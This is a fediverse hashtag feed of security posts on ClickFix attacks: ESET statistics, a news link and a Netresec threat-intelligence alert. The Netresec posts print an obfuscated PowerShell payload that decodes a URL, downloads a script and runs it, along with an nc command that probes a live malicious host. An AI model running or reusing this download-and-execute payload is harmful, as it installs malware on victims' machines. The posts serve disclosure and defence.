Discussion
Loading...

#Tag

Log in
  • About
  • Code of conduct
  • Privacy
  • Users
  • Instances
  • About Bonfire
Risotto Bias boosted
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲
@netresec@infosec.exchange  ·  activity timestamp yesterday

🔥 Finger service on 64.190.113.206:79 delivers malicious powershell injects after #ClickFix infections.
The malicious finger service can be probed with nc 64.190.113.206 79 <<< rcaptcha

nc 64.190.113.206 79 <<< rcaptcha
powershell -w h $rkdxui='ur' ;set-alias bertare c$($rkdxui)l;$iotdbycmkgwfp=(853,865,865,861,807,796,796,851,870,867,868,799,860,854,867,795,865,860,861,796,798,795,861,853,861,812,864,810,799,802,848,801,802,850,851,850,794,798,799,847,805,794,801,850,798,849,794,847,806,797,847,794,849,847,847,846,804,848,850,849,799,798,846,848);$zbvxekpyng=('reicporet','get-cmdlet');$viejarku=$iotdbycmkgwfp;foreach($izxrjgkps in $viejarku){$cfyapmhros=$izxrjgkps;$peqwajiln=$peqwajiln+[char]($cfyapmhros-749);$irfsex=$peqwajiln; $fenbohdt=$irfsex};$synwaxchklt[2]=$fenbohdt;$nuhjlqt='rl';$vxqnkui=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(bertare -useb $fenbohdt)
nc 64.190.113.206 79 <<< rcaptcha powershell -w h $rkdxui='ur' ;set-alias bertare c$($rkdxui)l;$iotdbycmkgwfp=(853,865,865,861,807,796,796,851,870,867,868,799,860,854,867,795,865,860,861,796,798,795,861,853,861,812,864,810,799,802,848,801,802,850,851,850,794,798,799,847,805,794,801,850,798,849,794,847,806,797,847,794,849,847,847,846,804,848,850,849,799,798,846,848);$zbvxekpyng=('reicporet','get-cmdlet');$viejarku=$iotdbycmkgwfp;foreach($izxrjgkps in $viejarku){$cfyapmhros=$izxrjgkps;$peqwajiln=$peqwajiln+[char]($cfyapmhros-749);$irfsex=$peqwajiln; $fenbohdt=$irfsex};$synwaxchklt[2]=$fenbohdt;$nuhjlqt='rl';$vxqnkui=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(bertare -useb $fenbohdt)
nc 64.190.113.206 79 <<< rcaptcha powershell -w h $rkdxui='ur' ;set-alias bertare c$($rkdxui)l;$iotdbycmkgwfp=(853,865,865,861,807,796,796,851,870,867,868,799,860,854,867,795,865,860,861,796,798,795,861,853,861,812,864,810,799,802,848,801,802,850,851,850,794,798,799,847,805,794,801,850,798,849,794,847,806,797,847,794,849,847,847,846,804,848,850,849,799,798,846,848);$zbvxekpyng=('reicporet','get-cmdlet');$viejarku=$iotdbycmkgwfp;foreach($izxrjgkps in $viejarku){$cfyapmhros=$izxrjgkps;$peqwajiln=$peqwajiln+[char]($cfyapmhros-749);$irfsex=$peqwajiln; $fenbohdt=$irfsex};$synwaxchklt[2]=$fenbohdt;$nuhjlqt='rl';$vxqnkui=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(bertare -useb $fenbohdt)
  • Copy link
  • Flag this post
  • Block
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲
@netresec@infosec.exchange  ·  activity timestamp yesterday

🔥 Finger service on 64.190.113.206:79 delivers malicious powershell injects after #ClickFix infections.
The malicious finger service can be probed with nc 64.190.113.206 79 <<< rcaptcha

nc 64.190.113.206 79 <<< rcaptcha
powershell -w h $rkdxui='ur' ;set-alias bertare c$($rkdxui)l;$iotdbycmkgwfp=(853,865,865,861,807,796,796,851,870,867,868,799,860,854,867,795,865,860,861,796,798,795,861,853,861,812,864,810,799,802,848,801,802,850,851,850,794,798,799,847,805,794,801,850,798,849,794,847,806,797,847,794,849,847,847,846,804,848,850,849,799,798,846,848);$zbvxekpyng=('reicporet','get-cmdlet');$viejarku=$iotdbycmkgwfp;foreach($izxrjgkps in $viejarku){$cfyapmhros=$izxrjgkps;$peqwajiln=$peqwajiln+[char]($cfyapmhros-749);$irfsex=$peqwajiln; $fenbohdt=$irfsex};$synwaxchklt[2]=$fenbohdt;$nuhjlqt='rl';$vxqnkui=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(bertare -useb $fenbohdt)
nc 64.190.113.206 79 <<< rcaptcha powershell -w h $rkdxui='ur' ;set-alias bertare c$($rkdxui)l;$iotdbycmkgwfp=(853,865,865,861,807,796,796,851,870,867,868,799,860,854,867,795,865,860,861,796,798,795,861,853,861,812,864,810,799,802,848,801,802,850,851,850,794,798,799,847,805,794,801,850,798,849,794,847,806,797,847,794,849,847,847,846,804,848,850,849,799,798,846,848);$zbvxekpyng=('reicporet','get-cmdlet');$viejarku=$iotdbycmkgwfp;foreach($izxrjgkps in $viejarku){$cfyapmhros=$izxrjgkps;$peqwajiln=$peqwajiln+[char]($cfyapmhros-749);$irfsex=$peqwajiln; $fenbohdt=$irfsex};$synwaxchklt[2]=$fenbohdt;$nuhjlqt='rl';$vxqnkui=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(bertare -useb $fenbohdt)
nc 64.190.113.206 79 <<< rcaptcha powershell -w h $rkdxui='ur' ;set-alias bertare c$($rkdxui)l;$iotdbycmkgwfp=(853,865,865,861,807,796,796,851,870,867,868,799,860,854,867,795,865,860,861,796,798,795,861,853,861,812,864,810,799,802,848,801,802,850,851,850,794,798,799,847,805,794,801,850,798,849,794,847,806,797,847,794,849,847,847,846,804,848,850,849,799,798,846,848);$zbvxekpyng=('reicporet','get-cmdlet');$viejarku=$iotdbycmkgwfp;foreach($izxrjgkps in $viejarku){$cfyapmhros=$izxrjgkps;$peqwajiln=$peqwajiln+[char]($cfyapmhros-749);$irfsex=$peqwajiln; $fenbohdt=$irfsex};$synwaxchklt[2]=$fenbohdt;$nuhjlqt='rl';$vxqnkui=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(bertare -useb $fenbohdt)
  • Copy link
  • Flag this post
  • Block
Zack Whittaker boosted
Kirsty
Kirsty
@AdminKirsty@infosec.space  ·  activity timestamp last week

#CyberSecurity #Infosec #malware #phishing #ClickFix
“ClickFix attacks are increasingly devious, dangerous, and can hack you in an instant
These attacks spoof Windows errors, CAPTCHAs, and real login pages to trick victims into hacking themselves with malware that skirts common cyber defenses.“

Emphasis on the hacking themselves element.

Thanks to @zackwhittaker
https://this.weekinsecurity.com/clickfix-attacks-are-increasingly-devious-dangerous-and-can-get-you-hacked-in-an-instant/

~this week in security~

ClickFix attacks are increasingly devious, dangerous, and can hack you in an instant

These attacks spoof Windows errors, CAPTCHAs, and real login pages to trick victims into hacking themselves with malware that skirts common cyber defenses.
  • Copy link
  • Flag this post
  • Block
Kirsty
Kirsty
@AdminKirsty@infosec.space  ·  activity timestamp last week

#CyberSecurity #Infosec #malware #phishing #ClickFix
“ClickFix attacks are increasingly devious, dangerous, and can hack you in an instant
These attacks spoof Windows errors, CAPTCHAs, and real login pages to trick victims into hacking themselves with malware that skirts common cyber defenses.“

Emphasis on the hacking themselves element.

Thanks to @zackwhittaker
https://this.weekinsecurity.com/clickfix-attacks-are-increasingly-devious-dangerous-and-can-get-you-hacked-in-an-instant/

~this week in security~

ClickFix attacks are increasingly devious, dangerous, and can hack you in an instant

These attacks spoof Windows errors, CAPTCHAs, and real login pages to trick victims into hacking themselves with malware that skirts common cyber defenses.
  • Copy link
  • Flag this post
  • Block
Etienne / Tek boosted
ESET Research
ESET Research
@ESETresearch@infosec.exchange  ·  activity timestamp 6 months ago
#ClickFix went from virtually non-existent to the second most common attack vector blocked by #ESET, surpassed only by #phishing. This novel social engineering technique accounted for nearly 8% of all detections in H1 2025. #ESETresearch
ClickFix lures users by displaying bogus error messages followed by quick fix instructions, including copy-pasting malicious code. Running the code in the victim’s command line interpreter delivers malware such as #RATs, infostealers, and cryptominers.
Between H2 2024 and H1 2025, ESET’s detection for ClickFix, HTML/FakeCaptcha, skyrocketed by 517%. Most detections in ESET telemetry were reported from Japan (23%), Peru (6%), and Poland, Spain, and Slovakia (>5% each).
What makes #ClickFix so effective? The fake error message looks convincing; instructions are simple, yet the copied command is too technical for most users to understand. Pasting it into cmd leads to compromise with final payloads, including #DarkGate or #LummaStealer.
While #ClickFix was introduced by cybercriminals, it’s since been adopted by APT groups: Kimsuky, Lazarus; Callisto, Sednit; MuddyWater; APT36. NK-aligned actors used it to target developers, steal crypto and passwords from Metamask and #macOS Keychain.
#ClickFix uses psychological manipulation by presenting fake issues and offering quick solutions, which makes it dangerously efficient. It appears in many forms – error popups, email attachments, fake reCAPTCHAs – highlighting the need for greater vigilance online.
Read more in the #ESETThreatReport:
🔗 https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025
3 media
Sorry, no caption provided by author
Sorry, no caption provided by author
Sorry, no caption provided by author
Sorry, no caption provided by author
Sorry, no caption provided by author
Sorry, no caption provided by author
Sorry, no caption provided by author
Sorry, no caption provided by author
Sorry, no caption provided by author
  • Copy link
  • Flag this post
  • Block
ESET Research
ESET Research
@ESETresearch@infosec.exchange  ·  activity timestamp 6 months ago
#ClickFix went from virtually non-existent to the second most common attack vector blocked by #ESET, surpassed only by #phishing. This novel social engineering technique accounted for nearly 8% of all detections in H1 2025. #ESETresearch
ClickFix lures users by displaying bogus error messages followed by quick fix instructions, including copy-pasting malicious code. Running the code in the victim’s command line interpreter delivers malware such as #RATs, infostealers, and cryptominers.
Between H2 2024 and H1 2025, ESET’s detection for ClickFix, HTML/FakeCaptcha, skyrocketed by 517%. Most detections in ESET telemetry were reported from Japan (23%), Peru (6%), and Poland, Spain, and Slovakia (>5% each).
What makes #ClickFix so effective? The fake error message looks convincing; instructions are simple, yet the copied command is too technical for most users to understand. Pasting it into cmd leads to compromise with final payloads, including #DarkGate or #LummaStealer.
While #ClickFix was introduced by cybercriminals, it’s since been adopted by APT groups: Kimsuky, Lazarus; Callisto, Sednit; MuddyWater; APT36. NK-aligned actors used it to target developers, steal crypto and passwords from Metamask and #macOS Keychain.
#ClickFix uses psychological manipulation by presenting fake issues and offering quick solutions, which makes it dangerously efficient. It appears in many forms – error popups, email attachments, fake reCAPTCHAs – highlighting the need for greater vigilance online.
Read more in the #ESETThreatReport:
🔗 https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025
3 media
Sorry, no caption provided by author
Sorry, no caption provided by author
Sorry, no caption provided by author
Sorry, no caption provided by author
Sorry, no caption provided by author
Sorry, no caption provided by author
Sorry, no caption provided by author
Sorry, no caption provided by author
Sorry, no caption provided by author
  • Copy link
  • Flag this post
  • Block

bonfire.cafe

A space for Bonfire maintainers and contributors to communicate

bonfire.cafe: About · Code of conduct · Privacy · Users · Instances
Bonfire social · 1.0.1-beta.35 no JS en
Automatic federation enabled
Log in
  • Explore
  • About
  • Members
  • Code of Conduct